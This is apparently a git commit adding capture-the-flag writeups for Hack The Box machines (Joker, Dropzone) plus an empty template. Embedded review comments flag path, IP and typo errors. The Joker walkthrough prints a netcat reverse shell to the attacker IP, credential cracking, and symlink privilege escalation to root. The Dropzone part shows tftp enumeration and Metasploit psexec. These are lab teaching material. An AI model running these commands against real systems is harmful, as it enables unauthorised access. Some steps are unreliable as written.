add hacking blogposts as they are

This commit is contained in:
oxeo0 2025-05-07 01:02:00 +02:00
parent fa65088be1
commit 325b9c3814
1904 changed files with 91353 additions and 0 deletions

Hard/0.md Normal file

@ -0,0 +1,66 @@
# Writeup
![](img/0.png)
## Introduction :
the text goes here
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :
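Review bot: Hard/0.md is an unfilled template and should not ship alongside the finished writeups in Hard/: the Introduction, Part 2 and Part 3 bodies are the placeholder "the text goes here", the title is the bare "# Writeup", the follow-up scan uses the placeholder port list `sudo nmap -sCV -p1,2 10.10.10.1`, and the Conclusion ends on "Here we can see the progress graph :" with no image line, whereas the other writeups close with a `![](img/N_graph.png)` reference. Either complete it or move it out of the Hard/ directory as a clearly named template so it is not indexed as a box writeup. Its header image `![](img/0.png)` also shares a filename with the header image in Hard/1.md, so one of the two will show the wrong picture.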

Hard/1.md Normal file

@ -0,0 +1,462 @@
# Joker Writeup
![](img/0.png)
## Introduction :
Joker is a hard linux box released back in May 2017.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.37/23 ] [ /dev/pts/16 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.21 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 22/tcp on 10.10.10.21
Discovered open port 3128/tcp on 10.10.10.21
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.37/23 ] [ /dev/pts/10 ] [~]
→ nmap -sCV 10.10.10.21 -Pn -p 22,3128
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:39 CEST
Nmap scan report for 10.10.10.21
Host is up (0.032s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
| 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~]
→ sudo nmap -sU 10.10.10.21 -p 69,5355
[sudo] password for nothing:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-29 17:53 CEST
Nmap scan report for 10.10.10.21
Host is up (0.028s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
5355/udp open|filtered llmnr
Nmap done: 1 IP address (1 host up) scanned in 1.62 second
## **Part 2 : Getting User Access**
The UDP scan picked up port 69 tftp so let's investigate it:
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
→ sudo pacman -S tftp-hpa
resolving dependencies...
looking for conflicting packages...
Packages (1) tftp-hpa-5.2-9
Total Download Size: 0,04 MiB
Total Installed Size: 0,09 MiB
:: Proceed with installation? [Y/n] y
:: Retrieving packages...
tftp-hpa-5.2-9-x86_64 37,8 KiB 1260 KiB/s 00:00 [###################################] 100%
(1/1) checking keys in keyring [###################################] 100%
(1/1) checking package integrity [###################################] 100%
(1/1) loading package files [###################################] 100%
(1/1) checking for file conflicts [###################################] 100%
(1/1) checking available disk space [###################################] 100%
:: Processing package changes...
(1/1) installing tftp-hpa [###################################] 100%
:: Running post-transaction hooks...
(1/2) Reloading system manager configuration...
(2/2) Arming ConditionNeedsUpdate...
[ 10.10.14.37/23 ] [ /dev/pts/11 ] [~/_HTB/Joker]
→ tftp 10.10.10.21
tftp> get passwords
Recieved 48 bytes in 5.9 seconds
Once we have the passwords file we will use john to crack it using the rockyou.txt wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Once it's done we have the credentials we need : ihateseafood (kalamari) so now let's make use of port 3128 (squid proxy) using firefox
![](prg/1/001.png) ![](prg/1/002.png)
So that's one way of doing it, but we can also use foxyproxy to do that:
![](prg/1/003.png)
Once that's done, visiting http://127.0.0.1 redirects us to a login prompt (where we put in the credentials john found earlier) and we are greeted by a shorty-url webpage. So we enumerate it using dirb
![](prg/1/004.png)
[ 10.10.14.37/23 ] [ /dev/pts/14 ] [~]
→ dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 29 18:19:04 2020
URL_BASE: http://127.0.0.1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.21:3128
PROXY AUTHORIZATION: kalamari:ihateseafood
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://127.0.0.1/ ----
+ http://127.0.0.1/console (CODE:200|SIZE:1479)
now we visit http://127.0.0.1/console and we are greeted by a python interpreter into which we're going to inject our reverse shell. but before that we need to enumerate a bit:
>>> import os
>>> os.popen("whoami").read()
'werkzeug\n'
>>> os.popen("nc -h").read()
''
>>> os.popen("nc -h 2>&1").read()
'OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)\nThis is nc from the netcat-openbsd package. An alternative nc is available\nin the netcat-traditional package.\nusage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]\n\t [-P proxy_username] [-p source_port] [-q seconds] [-s source]\n\t [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]\n\t [-x proxy_address[:port]] [destination] [port]\n\tCommand Summary:\n\t\t-4\t\tUse IPv4\n\t\t-6\t\tUse IPv6\n\t\t-b\t\tAllow broadcast\n\t\t-C\t\tSend CRLF as line-ending\n\t\t-D\t\tEnable the debug socket option\n\t\t-d\t\tDetach from stdin\n\t\t-h\t\tThis help text\n\t\t-I length\tTCP receive buffer length\n\t\t-i secs\t\tDelay interval for lines sent, ports scanned\n\t\t-j\t\tUse jumbo frame\n\t\t-k\t\tKeep inbound sockets open for multiple connects\n\t\t-l\t\tListen mode, for inbound connects\n\t\t-n\t\tSuppress name/port resolutions\n\t\t-O length\tTCP send buffer length\n\t\t-P proxyuser\tUsername for proxy authentication\n\t\t-p port\t\tSpecify local port for remote connects\n \t-q secs\t\tquit after EOF on stdin and delay of secs\n\t\t-r\t\tRandomize remote ports\n\t\t-S\t\tEnable the TCP MD5 signature option\n\t\t-s addr\t\tLocal source address\n\t\t-T toskeyword\tSet IP Type of Service\n\t\t-t\t\tAnswer TELNET negotiation\n\t\t-U\t\tUse UNIX domain socket\n\t\t-u\t\tUDP mode\n\t\t-V rtable\tSpecify alternate routing table\n\t\t-v\t\tVerbose\n\t\t-w secs\t\tTimeout for connects and final net reads\n\t\t-X proto\tProxy protocol: "4", "5" (SOCKS) or "connect"\n\t\t-x addr[:port]\tSpecify proxy address and port\n\t\t-Z\t\tDCCP mode\n\t\t-z\t\tZero-I/O mode [used for scanning]\n\tPort numbers can be individual or ranges: lo-hi [inclusive]\n'
>>>
so here we see that netcat is here, and the flags we have here are **-46bCDdhjklnrStUuvZz** it is important to note that we do not have the -e flag so it's here that many other people who made the writeup of this box falsely claimed they could just use pentestmonkey's python reverse shell one liner because it contains the -e flag which is not here for netcat. So to go around this we'll use another reverse shell one liner :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f
Here it is important to add the & at the end because if this is not successful, the webservice will die on us and we would need to revert the box. This makes sure that the process runs in the background on another thread in order for us to keep using the box in case if it doesn't work.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &
Now here we are dealing with a python interpreter so we need to wrap our payload within the os.popopen("").read() command:
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.37 9002 >/tmp/f &").read()
Sadly this doesn't work, and that is because there are iptables. We can see that here:
>>> os.popen("find /etc | grep iptables").read()
'/etc/iptables\n/etc/iptables/rules.v4\n/etc/iptables/rules.v6\n'
>>> os.popen("base64 -w 0 /etc/iptables/rules.v4").read()
'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'
>>>
then we decode it locally :
echo 'B64STRING' | base64 -d > iptables.v4
[ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
→ echo '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' | base64 -d > iptables.v4
[ 10.10.14.37/23 ] [ /dev/pts/8 ] [~/_HTB/Joker]
→ nano iptables.v4
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017
And here we see the problem, because we can only use a few ports for tcp (22 and 3128) , and the box accepts icmp (ping requests) as well as udp. So the easiest way to do it from here, is to spawn a reverse shell on a udp port instead of tcp.
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.13 9002 >/tmp/f &").read()
and of course, to recieve the reverse shell, we also need the -u flag on our end to make sure it is on our udp port:
nc -u -lvnp 9002
` ![](prg/1/006.png)
Now that we got our reverse shell, we are logged in as the user "werkzeug", we will first of all upgrade our reverse shell to a fully interactive shell:
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
→ nc -u -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.21] 48079
/bin/sh: 0: can't access tty; job control turned off
$ which bash
/bin/bash
$ which bash sh curl wget python python3
/bin/bash
/bin/sh
/usr/bin/curl
/usr/bin/wget
/usr/bin/python
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
werkzeug@joker:~$ ^Z
[1] + 18172 suspended nc -u -lvnp 9002
[ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Joker]
→ stty raw -echo ; fg
[1] + 18172 continued nc -u -lvnp 9002
export TERM=screen-256color
werkzeug@joker:~$ export SHELL=bash
werkzeug@joker:~$ stty rows 50 columns 200
werkzeug@joker:~$ reset
This reverse shell is very glitchy due to the use of the UDP protocol so make sure to press enter in between each previous step to make sure you get output.
Now we could run a privesc script to find the vulnerabilities for us, but it is a fairly simple one, we just type sudo -l
![](prg/1/009.png)
and here we see what this box is about, the user we are logged in as (werkzeug) may run the sudoedit command on joker as the user alekos on /var/www/*/*/layout.html
if we run dpkg -l sudo :
![](prg/1/010.png)
We see that sudo is version 1.8.16.0 and if we run a searchsploit command on this, we see that there is an exploit for it (namely 11651.sh and 37710.txt)
So the idea here is, that you can take advantage of this wildcard vulnerability in sudo using symlinks and therefore being able to edit files that you are not supposed to be able to edit. Namely the authorized_key file in root's .ssh directory to put our public key in:
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
→ cat ~/.ssh/mahakaliVM.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
[terminal 2]
werkzeug@joker:~/testing/nihilist$ ln -s /home/alekos/.ssh/authorized_keys layout.html
werkzeug@joker:~/testing/nihilist$ ls -lash
total 8.0K
4.0K drwxrwxr-x 2 werkzeug werkzeug 4.0K Jul 6 22:31 .
4.0K drwxr-xr-x 3 werkzeug werkzeug 4.0K Jul 6 22:30 ..
0 lrwxrwxrwx 1 werkzeug werkzeug 33 Jul 6 22:31 layout.html -> /home/alekos/.ssh/authorized_keys
werkzeug@joker:~/testing/nihilist$ sudoedit -u alekos /var/www/testin/nihilistlayout.html
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
werkzeug@joker:~/testing/nihilist$cat layout.html
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMOJqQ6+ycZGjPXSNkZ3zvgaHhEyLGcFb7fPfEIZSQl8 nothing@mahakali
Now that our public key is in alekos's authorized_keys file, let's ssh as alekos:
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Joker]
→ ssh alekos@10.10.10.21 -i ~/.ssh/mahakaliVM
The authenticity of host '10.10.10.21 (10.10.10.21)' can't be established.
ECDSA key fingerprint is SHA256:1yj4blzJwO5TYIZYFB3HMwXEqeflHc2iF1Idp3lZ94k.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.21' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Sat May 20 16:38:08 2017 from 10.10.13.210
alekos@joker:~$ id
uid=1001(alekos) gid=1001(alekos) groups=1001(alekos),1000(werkzeug)
alekos@joker:~$ ls -l
total 20
drwxrwx--- 2 root alekos 12288 Jul 6 22:40 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ cat user.txt
a2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And there you go! We managed to get the user flag.
## **Part 3 : Getting Root Access**
Now in order to privesc to root on this box we're going to take a look at alekos's files:
alekos@joker:~$ ls -lash backup/
total 336K
12K drwxrwx--- 2 root alekos 12K Jul 6 22:45 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K May 19 2017 ..
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
here we see that a backup is being made every 5 minutes by the root user. So let's extract one of these backups to see what it does:
alekos@joker:~/backup$ mkdir extract
alekos@joker:~/backup$ cd extract
alekos@joker:~/backup/extract$ cp ../dev-1625601001.tar.gz .
alekos@joker:~/backup/extract$ gunzip -d dev-1625601001.tar.gz
gzip: dev-1625601001.tar.gz: not in gzip format
alekos@joker:~/backup/extract$ ls -l
total 40
-rw-r----- 1 alekos alekos 40960 Jul 6 22:50 dev-1625601001.tar.gz
alekos@joker:~/backup/extract$ file dev-1625601001.tar.gz
dev-1625601001.tar.gz: POSIX tar archive (GNU)
alekos@joker:~/backup/extract$ tar -xvf dev-1625601001.tar.gz
__init__.py
application.py
data/
data/shorty.db
models.py
static/
static/style.css
templates/
templates/layout.html
templates/not_found.html
templates/list.html
templates/display.html
templates/new.html
utils.py
views.py
alekos@joker:~/backup/extract$ ls -lash ../../development/
total 36K
4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:50 ..
4.0K -rw-r----- 1 alekos alekos 1.5K May 18 2017 application.py
4.0K drwxrwx--- 2 alekos alekos 4.0K May 18 2017 data
0 -rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
4.0K -rw-r----- 1 alekos alekos 997 May 18 2017 models.py
4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 static
4.0K drwxr-x--- 2 alekos alekos 4.0K May 18 2017 templates
4.0K -rw-r----- 1 alekos alekos 2.5K May 18 2017 utils.py
4.0K -rw-r----- 1 alekos alekos 1.8K May 18 2017 views.py
alekos@joker:~/backup/extract$
And here we see that basically there is a backup of the development folder that's being made every 5 minutes. So we basically make a symbolic link to /root/ so that the next backup that's being made is going to be that of the **/root/** directory where the root flag is.
alekos@joker:~$ date
Tue Jul 6 22:53:48 EEST 2021
alekos@joker:~$ ls -l
total 20
drwxrwx--- 3 root alekos 12288 Jul 6 22:50 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ mv development/ dev.bak
alekos@joker:~$ ln -s /root/ development
alekos@joker:~$ ls -lash
total 52K
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 .
4.0K drwxr-xr-x 3 root root 4.0K May 16 2017 ..
12K drwxrwx--- 3 root alekos 12K Jul 6 22:50 backup
0 -rw------- 1 root root 0 May 17 2017 .bash_history
4.0K -rw-r--r-- 1 alekos alekos 220 May 16 2017 .bash_logout
4.0K -rw-r--r-- 1 alekos alekos 3.7K May 16 2017 .bashrc
4.0K drwx------ 2 alekos alekos 4.0K May 17 2017 .cache
4.0K drwxr-x--- 5 alekos alekos 4.0K May 18 2017 dev.bak
0 lrwxrwxrwx 1 alekos alekos 6 Jul 6 22:54 development -> /root/
4.0K drwxr-xr-x 2 alekos alekos 4.0K May 17 2017 .nano
4.0K -rw-r--r-- 1 alekos alekos 655 May 16 2017 .profile
4.0K drwxr-xr-x 2 alekos alekos 4.0K May 20 2017 .ssh
4.0K -r--r----- 1 root alekos 33 May 19 2017 user.txt
alekos@joker:~$ date
Tue Jul 6 22:54:13 EEST 2021
We wait for the next backup to happen, and then we extract it:
alekos@joker:~$ date
Tue Jul 6 22:55:19 EEST 2021
alekos@joker:~$ cd backup/
alekos@joker:~/backup$ ls -lash
total 392K
12K drwxrwx--- 3 root alekos 12K Jul 6 22:55 .
4.0K drwxr-xr-x 7 alekos alekos 4.0K Jul 6 22:54 ..
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134201.tar.gz
40K -rw-r----- 1 root alekos 40K Dec 24 2017 dev-1514134501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:20 dev-1625599201.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:25 dev-1625599501.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:30 dev-1625599801.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:35 dev-1625600101.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:40 dev-1625600401.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:45 dev-1625600701.tar.gz
40K -rw-r----- 1 root alekos 40K Jul 6 22:50 dev-1625601001.tar.gz
12K -rw-r----- 1 root alekos 10K Jul 6 22:55 dev-1625601301.tar.gz
4.0K drwxrwxr-x 5 alekos alekos 4.0K Jul 6 22:51 extract
alekos@joker:~/backup$ tar -xvf dev-1625601301.tar.gz
backup.sh
root.txt
alekos@joker:~/backup$ cat root.txt
d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We got the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/0_graph.png)
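Review bot: the sudoedit step in Part 2 does not reproduce as written: the symlink is created in `~/testing/nihilist` (`ln -s /home/alekos/.ssh/authorized_keys layout.html`), the sudoers entry quoted earlier restricts the target to `/var/www/*/*/layout.html`, yet the command shown is `sudoedit -u alekos /var/www/testin/nihilistlayout.html`, which has no separator before layout.html and does not point at the directory holding the symlink; please paste the exact path that was used so a reader can follow how the wildcard rule reaches the symlink. The same section says the goal is "the authorized_key file in root's .ssh directory" while every command targets /home/alekos/.ssh/authorized_keys and the following login is `ssh alekos@10.10.10.21`; the sentence should say alekos. The attacker address is also inconsistent: the UDP payload uses `nc -u 10.10.14.13 9002` while the listener and the earlier TCP attempts use 10.10.14.37 and 10.10.14.8, so at least one of the three is a copy error. Smaller fixes: `os.popopen("").read()` should read `os.popen`, there is a stray backtick before `![](prg/1/006.png)`, the tftp transcript reads "Recieved" where the tool prints "Received", and the searchsploit result cited as "11651.sh and 37710.txt" is asserted but the command and its output are not shown. Finally, the header image `![](img/0.png)` duplicates the one in Hard/0.md; given that Hard/10.md uses img/10.png, this file likely wants img/1.png.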

Hard/10.md Normal file

@ -0,0 +1,683 @@
# Dropzone Writeup
![](img/10.png)
## Introduction :
Dropzone is a hard windows box released back in May 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.6/23 ] [ /dev/pts/16 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.90 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 69/udp on 10.10.10.90
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~]
→ sudo nmap -sU -p69 -sCV -Pn 10.10.10.90
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 09:45 CET
Nmap scan report for 10.10.10.90
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
69/udp open tftp SolarWinds Free tftpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
## **Part 2 : Getting User Access**
So we know that we have tftp port opened, now let's enumerate it:
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~]
→ tftp 10.10.10.90
tftp> get /windows
Error code 1: Access to the path 'C:\windows' is denied.
tftp> get /%USERNAME%
Error code 1: Could not find file 'C:\%USERNAME%'.
tftp> get /windows/system32/config/SAM
Error code 1: The process cannot access the file 'C:\windows\system32\config\SAM' because it is being used by another process.
tftp> get /Documents and Settings
tftp: Documents: Is a directory
Error code 1: Could not find file 'C:\and'.
Error code 1: Could not find file 'C:\Settings'.
tftp>
tftp> get 'Documents and Settings'
Error code 1: Could not find file 'C:\'Documents'.
Error code 1: Could not find file 'C:\and'.
Error code 1: Could not find file 'C:\Settings''.
tftp> get "Documents and Settings"
Error code 0: Bailing out to bad characters in filename: '"Documents'.
Error code 1: Could not find file 'C:\and'.
Error code 0: Bailing out to bad characters in filename: 'Settings"'.
tftp>
Here we see a few things, first of all this is a windows machine because the first error tells us that the path C:\Windows exists but it's access is denied. Second of all, it looks like we cannot access the Documents and settings folder even when we wrap it in '' or "". This is because on older windows machines, there could not be long filenames, therefore the folder names would be 6 characters long and the number of whatever folder would match these first 8 letters like so:
tftp> get Docume~1
Error code 1: Access to the path 'C:\Documents and Settings' is denied.
tftp> get Docume~1/Admini~1
Error code 1: Access to the path 'C:\Documents and Settings\Administrator' is denied.
tftp>
As you can see, we write the first 6 characters and then ~1 to find the first folder that matches these first 6 characters, and we found the directories we wanted. now let's check if this is a 32bit or a 64bit machine by checking if the Program Files x86 folder exists (which would mean that the Program Files folder is the 64bit folder):
tftp> get /Progra~1
Error code 1: Access to the path 'C:\Program Files' is denied.
tftp> get /Progra~2
Error code 1: Could not find file 'C:\Progra~2'.
tftp>
And here we can see that there is only the Program Files folder, therefore it is safe to assume that this is a 32bit windows machine, and most probably windows XP. From here, we're going to use metasploit's psexec module:
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ locate psexec | grep metasploit
/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/ms17_010_psexec.md
/usr/share/doc/metasploit-framework/modules/exploit/windows/smb/psexec.md
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/current_user_psexec.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb
/usr/share/metasploit-framework/tools/exploit/psexec.rb
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ cp /usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb .
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ vim psexec.rb
And let's inspect what it does:
![](prg/10/1.png)
Here we're going to check the powershell part because older windows machines didn't have powershell, which is why most people stepped into a rabbithole by not inspecting what the exploit did exactly, so we're going to check what that execute_powershell_payload function does by looking at where it is actually defined:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ locate psexec | grep metasploit | xargs grep execute_powershell
**/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb: def execute_powershell_payload**
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
/usr/share/metasploit-framework/modules/exploits/windows/smb/psexec.rb: execute_powershell_payload
So here we see the function is defined in the first result:
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ cp /usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb .
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Dropzone]
→ nano psexec.rb
And here it is, so first of all this function executes cmd_psh_payload() which takes in 2 arguements, payload.encoded and the architecture (x86 or x64):
def execute_powershell_payload
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
Now let's generate this cmd_psh_payload() from metasploit's interactive ruby (which is like a debugger feature)
[ 10.10.14.6/23 ] [ /dev/pts/2 ] [~/_HTB/Dropzone]
→ msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.0.22-dev ]
+ -- --=[ 2086 exploits - 1126 auxiliary - 354 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
msf6 > search psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
2 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
3 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
4 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
5 encoder/x86/service manual No Register Service
6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
7 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
8 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
9 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
10 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/smb/webexec
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
